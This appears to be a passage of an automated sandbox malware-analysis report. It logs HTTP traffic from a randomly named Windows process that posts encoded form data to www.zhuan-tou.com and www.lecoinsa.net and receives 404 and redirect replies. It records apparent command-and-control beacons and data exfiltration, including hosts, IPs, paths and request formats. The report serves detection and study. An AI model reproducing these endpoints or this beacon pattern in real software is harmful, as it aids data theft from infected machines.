Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Origin: http://www.zhuan-tou.com
Referer: http://www.zhuan-tou.com/pjmu/
Content-Length: 220
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 2b 6a 66 39 32 4f 4e 31 36 59 6b 49 66 79 62 59 67 61 55 32 42 57 31 30 38 45 79 64 30 36 35 6f 43 77 64 4a 65 56 43 31 66 31 6f 59 4c 39 6d 48 46 49 33 39 54 47 4c 31 33 49 68 4c 44 57 4e 4d 42 38 4e 2f 77 73 64 2f 4f 73 4f 44 7a 4e 54 71 77 43 6a 48 62 78 38 4c 5a 4f 39 48 2f 56 66 4b 56 47 36 61 4d 35 32 47 43 67 39 47 30 4f 6e 7a 55 58 32 6c 4e 46 52 37 41 46 67 2f 75 78 6f 35 47 37 58 53 56 6d 51 79 4b 58 64 56 62 5a 75 34 34 67 72 6f 63 6a 4a 6b 53 37 4a 56 6c 4b 79 67 58 2b 4b 30 58 70 72 43 69 5a 56 66 6a 59 45 4e 41 7a 6f 2b 57 55 4d 6a 6f 5a 51 49 65 33 4d 2f 44 6c 4e 64 74 61 46 32 5a 56 70 4f 34 38 75 37 6e 31 38 48 69 43 49 3d
                                                    Data Ascii: efM=+jf92ON16YkIfybYgaU2BW108Eyd065oCwdJeVC1f1oYL9mHFI39TGL13IhLDWNMB8N/wsd/OsODzNTqwCjHbx8LZO9H/VfKVG6aM52GCg9G0OnzUX2lNFR7AFg/uxo5G7XSVmQyKXdVbZu44grocjJkS7JVlKygX+K0XprCiZVfjYENAzo+WUMjoZQIe3M/DlNdtaF2ZVpO48u7n18HiCI=

Timestamp: Aug 5, 2024 15:31:37.858598948 CEST, Bytes transferred: 691, Direction: IN, Data:
HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 05 Aug 2024 13:31:37 GMT
Content-Type: text/html
Content-Length: 548
Connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID: 3, Source IP: 192.168.2.4, Source Port: 55401, Destination IP: 38.12.1.29, Destination Port: 80, PID: 2056, Process: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe

Timestamp: Aug 5, 2024 15:31:39.580959082 CEST, Bytes transferred: 10808, Direction: OUT, Data:
POST /pjmu/ HTTP/1.1
Host: www.zhuan-tou.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Origin: http://www.zhuan-tou.com
Referer: http://www.zhuan-tou.com/pjmu/
Content-Length: 10300
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 2b 6a 66 39 32 4f 4e 31 36 59 6b 49 66 79 62 59 67 61 55 32 42 57 31 30 38 45 79 64 30 36 35 6f 43 77 64 4a 65 56 43 31 66 31 51 59 4c 50 65 48 45 72 50 39 53 47 4c 31 30 49 68 4f 44 57 4e 72 42 38 56 37 77 73 52 76 4f 71 53 44 7a 6f 50 71 67 67 4c 48 53 78 38 4c 51 75 39 61 68 6c 66 36 56 47 72 64 4d 34 47 47 43 67 39 47 30 50 58 7a 58 43 4b 6c 50 46 52 38 57 56 67 4e 2f 42 6f 64 47 37 50 43 56 6d 55 49 4b 6d 39 56 62 35 65 34 39 57 2f 6f 51 6a 4a 6d 56 37 4a 4e 6c 50 71 76 58 2b 57 57 58 70 66 6b 69 62 4a 66 69 35 31 74 63 77 45 39 4a 31 45 4b 72 61 77 2b 66 47 73 4b 45 57 42 71 38 4b 74 68 4e 55 70 66 38 38 66 30 2b 68 41 61 6a 43 75 5a 45 56 76 33 37 34 4d 6e 47 62 7a 45 4b 4f 61 42 30 67 56 6b 4d 6e 2f 43 76 47 47 67 69 42 4c 6d 4e 6f 73 4d 6d 4a 55 74 61 77 34 55 4e 33 39 71 6f 32 75 30 32 46 6d 5a 2f 53 77 2b 34 37 36 48 2f 35 37 62 4f 2b 6d 64 41 69 49 41 4b 6c 6b 72 35 53 6f 31 30 4e 2b 4c 2f 68 52 4d 33 63 32 6f 42 57 31 73 4b 61 63 48 59 6b 76 52 70 5a 38 34 30 73 76 45 57 30 [TRUNCATED]
Data Ascii: efM= [TRUNCATED]

Timestamp: Aug 5, 2024 15:31:40.562031031 CEST, Bytes transferred: 691, Direction: IN, Data:
HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 05 Aug 2024 13:31:40 GMT
Content-Type: text/html
Content-Length: 548
Connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID: 4, Source IP: 192.168.2.4, Source Port: 55402, Destination IP: 38.12.1.29, Destination Port: 80, PID: 2056, Process: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe

Timestamp: Aug 5, 2024 15:31:42.111552954 CEST, Bytes transferred: 438, Direction: OUT, Data:
GET /pjmu/?efM=zh3d17Jww7lUdSTn18h3AW52xQeHiultGm9RdVCgVGhfN4W3cKL6T1z80tBiQSN9EuR6w+tbLdSr4eDL0g7GYgJ6QddEnX3CYXXMD+mGHjpcx+XzQAKiSmY=&GTP=uhqpjxIPh HTTP/1.1
Host: www.zhuan-tou.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31

Timestamp: Aug 5, 2024 15:31:42.990638018 CEST, Bytes transferred: 691, Direction: IN, Data:
HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 05 Aug 2024 13:31:42 GMT
Content-Type: text/html
Content-Length: 548
Connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID: 5, Source IP: 192.168.2.4, Source Port: 55403, Destination IP: 217.116.0.191, Destination Port: 80, PID: 2056, Process: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe

Timestamp: Aug 5, 2024 15:31:48.299766064 CEST, Bytes transferred: 703, Direction: OUT, Data:
POST /7ffx/ HTTP/1.1
Host: www.lecoinsa.net
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Origin: http://www.lecoinsa.net
Referer: http://www.lecoinsa.net/7ffx/
Content-Length: 200
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 57 50 34 55 38 35 51 38 49 43 6e 76 45 65 32 35 32 6d 53 45 4a 61 6c 6b 2b 57 78 48 43 53 54 68 63 4c 39 59 2f 68 6b 4a 63 41 53 52 6a 2f 2f 75 7a 72 7a 39 6f 34 51 6a 50 49 56 77 51 36 69 38 50 46 49 6d 62 76 6a 41 65 7a 4d 72 30 6d 66 55 58 57 52 71 43 69 2b 36 4e 68 37 4c 35 57 38 62 42 43 63 6f 78 34 7a 6f 52 42 35 62 43 6c 44 6e 31 36 46 61 36 37 64 2b 48 47 46 35 2b 6b 48 58 53 44 74 2f 57 6d 4b 78 54 35 6e 78 4f 4b 37 75 33 69 4c 5a 49 35 47 78 4f 45 69 51 46 41 33 38 36 55 6d 7a 32 73 33 53 7a 39 6f 77 7a 35 46 49 39 56 4b 48 59 72 39 70 63 4e 45 70 35 78 42 63 66 67 3d 3d
                                                    Data Ascii: efM=WP4U85Q8ICnvEe252mSEJalk+WxHCSThcL9Y/hkJcASRj//uzrz9o4QjPIVwQ6i8PFImbvjAezMr0mfUXWRqCi+6Nh7L5W8bBCcox4zoRB5bClDn16Fa67d+HGF5+kHXSDt/WmKxT5nxOK7u3iLZI5GxOEiQFA386Umz2s3Sz9owz5FI9VKHYr9pcNEp5xBcfg==

Timestamp: Aug 5, 2024 15:31:48.976499081 CEST, Bytes transferred: 572, Direction: IN, Data:
HTTP/1.1 301 Moved Permanently
Server: openresty
Date: Mon, 05 Aug 2024 13:31:48 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Location: http://lecoinsa.net/7ffx/
                                                    Data Raw: 31 35 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 37 66 66 78 2f 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 37 66 66 78 2f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 37 66 66 78 2f 22 3e 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 37 66 66 78 2f 3c 2f 61 3e 2e 0a 20 20 20 20 3c 2f [TRUNCATED]
                                                    Data Ascii: 15a<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='http://lecoinsa.net/7ffx/'" /> <title>Redirecting to http://lecoinsa.net/7ffx/</title> </head> <body> Redirecting to <a href="http://lecoinsa.net/7ffx/">http://lecoinsa.net/7ffx/</a>. </body></html>0


Session ID: 6, Source IP: 192.168.2.4, Source Port: 55404, Destination IP: 217.116.0.191, Destination Port: 80, PID: 2056, Process: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe

Timestamp: Aug 5, 2024 15:31:50.840605974 CEST, Bytes transferred: 723, Direction: OUT, Data:
POST /7ffx/ HTTP/1.1
Host: www.lecoinsa.net
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Origin: http://www.lecoinsa.net
Referer: http://www.lecoinsa.net/7ffx/
Content-Length: 220
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 57 50 34 55 38 35 51 38 49 43 6e 76 46 2f 47 35 37 6c 36 45 63 71 6c 6e 6e 57 78 48 4a 79 54 74 63 4c 35 59 2f 6b 63 5a 64 32 43 52 69 62 7a 75 79 75 66 39 76 34 51 6a 58 34 56 31 65 61 69 72 50 46 4d 66 62 71 62 41 65 7a 49 72 30 6a 62 55 58 68 46 74 43 79 2b 34 56 52 37 7a 33 32 38 62 42 43 63 6f 78 34 6d 44 52 46 56 62 42 55 7a 6e 31 62 46 56 6d 4c 64 35 4f 6d 46 35 70 30 47 63 53 44 73 51 57 6e 57 62 54 37 66 78 4f 50 58 75 35 58 33 61 43 35 47 7a 41 6b 69 46 50 67 65 44 69 56 44 6c 6f 38 6e 74 39 64 59 63 32 2f 55 53 73 6b 72 51 4b 72 5a 61 42 4b 4e 64 30 79 38 56 45 67 7a 62 54 45 63 65 76 70 4d 45 55 48 4e 35 4f 4d 69 46 66 31 55 3d
                                                    Data Ascii: efM=WP4U85Q8ICnvF/G57l6EcqlnnWxHJyTtcL5Y/kcZd2CRibzuyuf9v4QjX4V1eairPFMfbqbAezIr0jbUXhFtCy+4VR7z328bBCcox4mDRFVbBUzn1bFVmLd5OmF5p0GcSDsQWnWbT7fxOPXu5X3aC5GzAkiFPgeDiVDlo8nt9dYc2/USskrQKrZaBKNd0y8VEgzbTEcevpMEUHN5OMiFf1U=
                                                    Aug 5, 2024 15:31:51.526330948 CEST | 572               | IN        | HTTP/1.1 301 Moved Permanently
                                                    Server: openresty
                                                    Date: Mon, 05 Aug 2024 13:31:51 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Location: http://lecoinsa.net/7ffx/
                                                    Data Raw: 31 35 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 37 66 66 78 2f 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 37 66 66 78 2f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 37 66 66 78 2f 22 3e 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 37 66 66 78 2f 3c 2f 61 3e 2e 0a 20 20 20 20 3c 2f [TRUNCATED]
                                                    Data Ascii: 15a<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='http://lecoinsa.net/7ffx/'" /> <title>Redirecting to http://lecoinsa.net/7ffx/</title> </head> <body> Redirecting to <a href="http://lecoinsa.net/7ffx/">http://lecoinsa.net/7ffx/</a>. </body></html>0


                                                    Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                    7          | 192.168.2.4 | 55405       | 217.116.0.191  | 80               | 2056 | C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    Timestamp                           | Bytes transferred | Direction | Data
                                                    Aug 5, 2024 15:31:53.384526968 CEST | 10805             | OUT       | POST /7ffx/ HTTP/1.1
                                                    Host: www.lecoinsa.net
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
                                                    Origin: http://www.lecoinsa.net
                                                    Referer: http://www.lecoinsa.net/7ffx/
                                                    Content-Length: 10300
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 57 50 34 55 38 35 51 38 49 43 6e 76 46 2f 47 35 37 6c 36 45 63 71 6c 6e 6e 57 78 48 4a 79 54 74 63 4c 35 59 2f 6b 63 5a 64 32 4b 52 69 6f 37 75 79 4a 72 39 75 34 51 6a 4a 49 56 30 65 61 6a 70 50 46 30 62 62 71 48 51 65 78 67 72 31 46 6e 55 52 54 39 74 52 53 2b 34 4a 68 37 49 35 57 39 54 42 44 77 73 78 34 32 44 52 46 56 62 42 57 37 6e 38 71 46 56 6b 4c 64 2b 48 47 46 31 2b 6b 48 37 53 44 6c 6e 57 6b 36 68 54 4b 2f 78 4f 72 33 75 30 46 66 61 59 35 47 31 4e 45 6a 41 50 67 43 69 69 56 66 66 6f 2f 37 48 39 65 45 63 32 2b 35 4a 30 67 79 4f 54 71 35 4a 57 34 5a 66 79 31 51 62 4a 42 62 56 59 6c 55 62 78 4a 45 4b 66 6c 77 64 52 2b 75 34 45 6a 57 35 6a 42 71 58 74 4a 7a 54 6b 2b 72 55 6b 4f 6b 30 6c 32 62 76 42 37 45 46 6b 72 39 41 63 63 4a 63 47 63 6c 64 36 67 6d 4f 53 41 6e 62 53 53 74 47 35 62 43 43 38 2f 6c 57 36 52 70 2b 58 67 4c 77 78 6c 52 39 37 4a 41 49 65 30 74 65 2b 63 34 6c 42 2f 75 53 65 39 78 4c 59 35 47 76 6e 33 51 39 62 2b 5a 67 34 38 34 63 49 73 6b 68 69 77 31 35 4c 63 63 4d 76 63 [TRUNCATED]
                                                    Data Ascii: efM= [TRUNCATED]
                                                    Aug 5, 2024 15:31:54.185596943 CEST | 572               | IN        | HTTP/1.1 301 Moved Permanently
                                                    Server: openresty
                                                    Date: Mon, 05 Aug 2024 13:31:54 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Location: http://lecoinsa.net/7ffx/
                                                    Data Raw: 31 35 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 37 66 66 78 2f 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 37 66 66 78 2f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 37 66 66 78 2f 22 3e 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 37 66 66 78 2f 3c 2f 61 3e 2e 0a 20 20 20 20 3c 2f [TRUNCATED]
                                                    Data Ascii: 15a<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='http://lecoinsa.net/7ffx/'" /> <title>Redirecting to http://lecoinsa.net/7ffx/</title> </head> <body> Redirecting to <a href="http://lecoinsa.net/7ffx/">http://lecoinsa.net/7ffx/</a>. </body></html>0


                                                    Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                    8          | 192.168.2.4 | 55406       | 217.116.0.191  | 80               | 2056 | C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    Timestamp                           | Bytes transferred | Direction | Data
                                                    Aug 5, 2024 15:31:56.253350019 CEST | 437               | OUT       | GET /7ffx/?GTP=uhqpjxIPh&efM=bNQ0/ONSUiz8CveulmeeGbtq+RYAIRndZ9NU1FoLXha3tv70s5bqu4Q6Bv5eGpaoTDYvbrT1RjV74F6wZTVOAhq5NAvf33Q9AnwF2+P6bz1BMUvu37pM7qc= HTTP/1.1
                                                    Host: www.lecoinsa.net
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Aug 5, 2024 15:31:57.075639009 CEST | 1236              | IN        | HTTP/1.1 301 Moved Permanently
                                                    Server: openresty
                                                    Date: Mon, 05 Aug 2024 13:31:56 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Length: 918
                                                    Connection: close
                                                    Location: http://lecoinsa.net/7ffx/?GTP=uhqpjxIPh&efM=bNQ0/ONSUiz8CveulmeeGbtq+RYAIRndZ9NU1FoLXha3tv70s5bqu4Q6Bv5eGpaoTDYvbrT1RjV74F6wZTVOAhq5NAvf33Q9AnwF2+P6bz1BMUvu37pM7qc=
                                                    Age: 0
                                                    X-Cache: MISS
                                                    X-BKSrc: 0.6
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 37 66 66 78 2f 3f 47 54 50 3d 75 68 71 70 6a 78 49 50 68 26 61 6d 70 3b 65 66 4d 3d 62 4e 51 30 2f 4f 4e 53 55 69 7a 38 43 76 65 75 6c 6d 65 65 47 62 74 71 2b 52 59 41 49 52 6e 64 5a 39 4e 55 31 46 6f 4c 58 68 61 33 74 76 37 30 73 35 62 71 75 34 51 36 42 76 35 65 47 70 61 6f 54 44 59 76 62 72 54 31 52 6a 56 37 34 46 36 77 5a 54 56 4f 41 68 71 35 4e 41 76 66 33 33 51 39 41 6e 77 46 32 2b 50 36 62 7a 31 42 4d 55 76 75 33 37 70 4d 37 71 63 3d 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 [TRUNCATED]
